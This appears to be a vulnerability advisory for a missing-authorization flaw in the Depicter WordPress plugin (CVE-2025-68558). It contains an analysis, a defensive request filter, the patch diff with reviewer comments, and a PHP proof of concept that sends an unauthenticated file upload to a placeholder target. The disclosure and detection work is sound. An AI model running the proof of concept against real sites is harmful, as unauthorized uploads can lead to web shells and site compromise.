Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-68558: Depicter Slider <= 4.0.4 – Missing Authorization (depicter)

Plugin depicter
Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 4.0.4
Patched Version 4.0.5
Disclosed January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68558:
The Depicter WordPress plugin, versions up to and including 4.0.4, contains a missing authorization vulnerability. This flaw allows unauthenticated attackers to perform unauthorized actions, specifically file uploads, due to insufficient capability checks on an AJAX endpoint.

The root cause is the absence of a capability check in the `uploadFile` method of the `FileUploaderController` class. The vulnerable function, located in `/depicter/app/src/Controllers/Ajax/FileUploaderController.php`, processes file uploads via an AJAX route. The code before the patch directly accessed the `$request->files()` array without verifying if the current user possesses the `upload_files` WordPress capability. This missing check allowed any user, including unauthenticated visitors, to trigger the file upload logic.

An attacker can exploit this by sending a crafted POST request to the WordPress `admin-ajax.php` endpoint. The request must specify the AJAX action `depicter/dashboard/ajax/upload/file`. The attacker includes file data in the request body, mimicking a legitimate file upload from the plugin’s editor interface. No authentication cookies or nonces are required for this request in the vulnerable versions.

The patch adds an authorization check at the beginning of the `uploadFile` method. The fix inserts a conditional statement that calls `current_user_can('upload_files')`. If the check fails, the function returns a JSON error response with a 400 status code. The patch also adds CSRF middleware (`csrf-api:depicter-editor`) to several related AJAX routes in `/depicter/app/routes/ajax.php` to further harden the rules management endpoints.

Successful exploitation allows an unauthenticated attacker to upload arbitrary files to the WordPress server. Depending on server configuration and file type restrictions, this could lead to remote code execution by uploading a web shell, or to a denial of service by exhausting disk space. It also violates the integrity of the site’s media library.
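One way to spot the request pattern described above while a site is still on 4.0.4, as an added example that is not part of this advisory or of the Depicter plugin: a small Python pre-filter in the style of a virtual patch. It parses a raw HTTP request, extracts the WordPress AJAX `action` from the query string or the form body (admin-ajax.php reads it from `$_REQUEST`, so both must be checked), and flags POSTs to admin-ajax.php that carry the Depicter upload action without any `wordpress_logged_in_*` cookie. The only value taken from the advisory is the action name; the host name, cookie value, multipart boundary and request bodies are constructed sample data.

```python
"""Virtual-patch style pre-filter for unauthenticated Depicter upload requests.

Constructed example, not part of the Depicter plugin or of the advisory.
Cookie presence is only a heuristic: WordPress validates the session itself
and, on 4.0.5+, enforces upload_files, so the rule deliberately lets
authenticated-looking traffic through and blocks only the anonymous case.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Action name quoted in the advisory; everything else below is constructed.
VULN_ACTION = "depicter/dashboard/ajax/upload/file"
AJAX_PATH = "/wp-admin/admin-ajax.php"


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def has_logged_in_cookie(headers) -> bool:
    """True if any cookie name starts with wordpress_logged_in_ (not validated here)."""
    cookie = headers.get("cookie", "")
    return any(c.strip().startswith("wordpress_logged_in_") for c in cookie.split(";"))


def extract_action(target: str, headers, body: str):
    """Return the AJAX action from the query string, else from the form body."""
    query = parse_qs(urlsplit(target).query)
    if "action" in query:
        return query["action"][0]
    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        return parse_qs(body).get("action", [None])[0]
    if ctype.startswith("multipart/form-data"):
        # Minimal multipart handling: value of the first part named "action".
        m = re.search(r'name="action"\r\n(?:[^\r\n]+\r\n)*\r\n([^\r\n]*)', body)
        return m.group(1) if m else None
    return None


def evaluate(raw: str) -> dict:
    """Decide whether one raw request matches the CVE-2025-68558 pattern."""
    method, target, headers, body = parse_request(raw)
    path = urlsplit(target).path
    action = extract_action(target, headers, body)
    if method != "POST" or not path.endswith(AJAX_PATH) or action != VULN_ACTION:
        return {"block": False, "reason": "not the Depicter upload action", "action": action}
    if has_logged_in_cookie(headers):
        # Defer to WordPress: it validates the cookie and (on 4.0.5+) the capability.
        return {"block": False, "reason": "session cookie present; defer to WordPress", "action": action}
    return {"block": True, "reason": "unauthenticated Depicter upload attempt", "action": action}


# Constructed sample requests (hostname, boundary and cookie value are made up).
BOUNDARY = "----constructedboundary"
ANON_UPLOAD = (
    "POST /wp-admin/admin-ajax.php HTTP/1.1\r\n"
    "Host: example.test\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="action"\r\n'
    "\r\n"
    f"{VULN_ACTION}\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="file"; filename="test.jpg"\r\n'
    "Content-Type: image/jpeg\r\n"
    "\r\n"
    "not-really-a-jpeg\r\n"
    f"--{BOUNDARY}--\r\n"
)
LOGGED_IN_UPLOAD = ANON_UPLOAD.replace(
    "Host: example.test\r\n",
    "Host: example.test\r\nCookie: wordpress_logged_in_abc=constructed\r\n",
)
OTHER_ACTION = (
    "POST /wp-admin/admin-ajax.php HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "action=heartbeat&_nonce=constructed"
)

if __name__ == "__main__":
    for label, req in [("anonymous upload", ANON_UPLOAD),
                       ("logged-in upload", LOGGED_IN_UPLOAD),
                       ("unrelated action", OTHER_ACTION)]:
        print(f"{label}: {evaluate(req)}")
```

The filter blocks the anonymous multipart upload, passes the same request when a session cookie is present, and ignores other actions. The multipart parsing is intentionally minimal (first part named `action`); a production rule engine would use a real multipart parser and would also rate-limit or alert rather than silently drop, so that exploitation attempts still show up in logs.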

Differential between vulnerable and patched code

Code Diff
--- a/depicter/app/routes/ajax.php
+++ b/depicter/app/routes/ajax.php
@@ -471,18 +471,22 @@
 // ========================================================
 Depicter::route()->methods(['POST'])
     ->where('ajax', 'depicter-document-rules-store', true, true)
+    ->middleware('csrf-api:depicter-editor')
     ->handle('RulesAjaxController@store');

 Depicter::route()->methods(['GET'])
         ->where('ajax', 'depicter-document-rules-show', true, true)
+        ->middleware('csrf-api:depicter-editor')
         ->handle('RulesAjaxController@show');

 Depicter::route()->methods(['GET'])
         ->where('ajax', 'depicter-condition-all', true, true)
+        ->middleware('csrf-api:depicter-editor')
         ->handle('RulesAjaxController@all');

 Depicter::route()->methods(['GET'])
         ->where('ajax', 'depicter-document-condition-options', true, true)
+        ->middleware('csrf-api:depicter-editor')
         ->handle('RulesAjaxController@conditionValues');

 Depicter::route()->methods(['POST'])
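Review bot: the `->middleware('csrf-api:depicter-editor')` lines added to the four RulesAjaxController routes address cross-site request forgery, not the missing capability check the advisory is about; nothing in this hunk shows the handlers calling current_user_can(), and the upload route for 'depicter/dashboard/ajax/upload/file' does not appear here, so confirm that the upload route receives the same middleware and that the RulesAjaxController methods enforce a capability of their own. The trailing context line `Depicter::route()->methods(['POST'])` opens a further route whose middleware state is not visible in the diff.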
--- a/depicter/app/src/Controllers/Ajax/FileUploaderController.php
+++ b/depicter/app/src/Controllers/Ajax/FileUploaderController.php
@@ -8,6 +8,13 @@
 	public function uploadFile(RequestInterface $request, $view) {

 		try{
+
+			if ( ! current_user_can('upload_files') ) {
+				return Depicter::json([
+					'errors' => [ __('You do not have permission to upload files.', 'depicter' ) ]
+				])->withStatus(400 );
+			}
+
 			$files = $request->files();

 			if ( empty( $files ) ) {
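Review bot: the new `current_user_can('upload_files')` guard returns `->withStatus(400 )`, which reads as a malformed request; 403 is the conventional status for an authorization failure and makes the denial easier to distinguish in logs and WAF rules (also note the stray space before the closing parenthesis). The hunk shows no nonce or referer verification around uploadFile(): the capability check stops anonymous callers but not a logged-in user driven through CSRF, so the `csrf-api:depicter-editor` middleware applied to other routes in this patch should cover the upload route as well.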
--- a/depicter/depicter.php
+++ b/depicter/depicter.php
@@ -3,7 +3,7 @@
  * Plugin Name: Depicter
  * Plugin URI: https://depicter.com
  * Description: Build stunning sliders, popups, carousels, video sliders, post sliders, and WooCommerce sliders fast and easy.
- * Version: 4.0.4
+ * Version: 4.0.5
  * Requires at least: 5.3
  * Requires PHP: 7.4.0
  * Author: Depicter Slider and Popup by Averta
@@ -17,7 +17,7 @@
  * @package Depicter
  */

-const DEPICTER_VERSION = '4.0.4';
+const DEPICTER_VERSION = '4.0.5';

 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
--- a/depicter/vendor/autoload.php
+++ b/depicter/vendor/autoload.php
@@ -14,10 +14,7 @@
             echo $err;
         }
     }
-    trigger_error(
-        $err,
-        E_USER_ERROR
-    );
+    throw new RuntimeException($err);
 }

 require_once __DIR__ . '/composer/autoload_real.php';
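Review bot: replacing trigger_error(..., E_USER_ERROR) with `throw new RuntimeException($err)` in the vendored Composer autoloader is generated code from a Composer upgrade, unrelated to the authorization fix; it changes the failure mode from a fatal error to an uncaught exception that callers could in principle catch. Fine to ship, but the changelog should list it as a tooling update rather than part of the security fix.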
--- a/depicter/vendor/composer/InstalledVersions.php
+++ b/depicter/vendor/composer/InstalledVersions.php
@@ -27,6 +27,12 @@
 class InstalledVersions
 {
     /**
+     * @var string|null if set (by reflection by Composer), this should be set to the path where this class is being copied to
+     * @internal
+     */
+    private static $selfDir = null;
+
+    /**
      * @var mixed[]|null
      * @psalm-var array{root: array{name: string, pretty_version: string, version: string, reference: string|null, type: string, install_path: string, aliases: string[], dev: bool}, versions: array<string, array{pretty_version?: string, version?: string, reference?: string|null, type?: string, install_path?: string, aliases?: string[], dev_requirement: bool, replaced?: string[], provided?: string[]}>}|array{}|null
      */
@@ -323,6 +329,18 @@
     }

     /**
+     * @return string
+     */
+    private static function getSelfDir()
+    {
+        if (self::$selfDir === null) {
+            self::$selfDir = strtr(__DIR__, '\', '/');
+        }
+
+        return self::$selfDir;
+    }
+
+    /**
      * @return array[]
      * @psalm-return list<array{root: array{name: string, pretty_version: string, version: string, reference: string|null, type: string, install_path: string, aliases: string[], dev: bool}, versions: array<string, array{pretty_version?: string, version?: string, reference?: string|null, type?: string, install_path?: string, aliases?: string[], dev_requirement: bool, replaced?: string[], provided?: string[]}>}>
      */
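Review bot: `strtr(__DIR__, '\', '/')` in the added getSelfDir() is not valid PHP as rendered, because the backslash escapes the closing single quote; Composer's generated InstalledVersions.php uses `'\\'` for this literal, and the same form appears in the next hunk's removed line and its `$vendorDir` context line, so this is most likely a rendering artifact of the diff, but it should be checked against the actual 4.0.5 file before merge.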
@@ -336,7 +354,7 @@
         $copiedLocalDir = false;

         if (self::$canGetVendors) {
-            $selfDir = strtr(__DIR__, '\', '/');
+            $selfDir = self::getSelfDir();
             foreach (ClassLoader::getRegisteredLoaders() as $vendorDir => $loader) {
                 $vendorDir = strtr($vendorDir, '\', '/');
                 if (isset(self::$installedByVendor[$vendorDir])) {
--- a/depicter/vendor/composer/platform_check.php
+++ b/depicter/vendor/composer/platform_check.php
@@ -19,8 +19,7 @@
             echo 'Composer detected issues in your platform:' . PHP_EOL.PHP_EOL . str_replace('You are running '.PHP_VERSION.'.', '', implode(PHP_EOL, $issues)) . PHP_EOL.PHP_EOL;
         }
     }
-    trigger_error(
-        'Composer detected issues in your platform: ' . implode(' ', $issues),
-        E_USER_ERROR
+    throw new RuntimeException(
+        'Composer detected issues in your platform: ' . implode(' ', $issues)
     );
 }

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68558 - Depicter Slider <= 4.0.4 - Missing Authorization

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';

// The vulnerable AJAX action for file upload.
$action = 'depicter/dashboard/ajax/upload/file';

// Path to a test file to upload.
$file_path = '/tmp/test.jpg';

// Prepare the POST data with the action parameter.
$post_fields = [
    'action' => $action
];

// Prepare the file for upload using CURLFile.
if (file_exists($file_path) && is_readable($file_path)) {
    $cfile = new CURLFile($file_path, 'image/jpeg', 'test.jpg');
    $post_fields['file'] = $cfile;
} else {
    die("Test file not found or not readable: $file_path\n");
}

// Initialize cURL session.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Execute the request.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Analyze the response.
echo "HTTP Status Code: $http_code\n";
echo "Response Body: $response\n";

// Check for success indicators. A patched site (4.0.5+) answers the
// unauthenticated request with HTTP 400 and a JSON body containing "errors".
if ($http_code == 200 && strpos($response, '"errors"') === false) {
    echo "\n[+] The target appears vulnerable. File upload may have succeeded.\n";
} else {
    echo "\n[-] The target may be patched or the request failed.\n";
}

?>
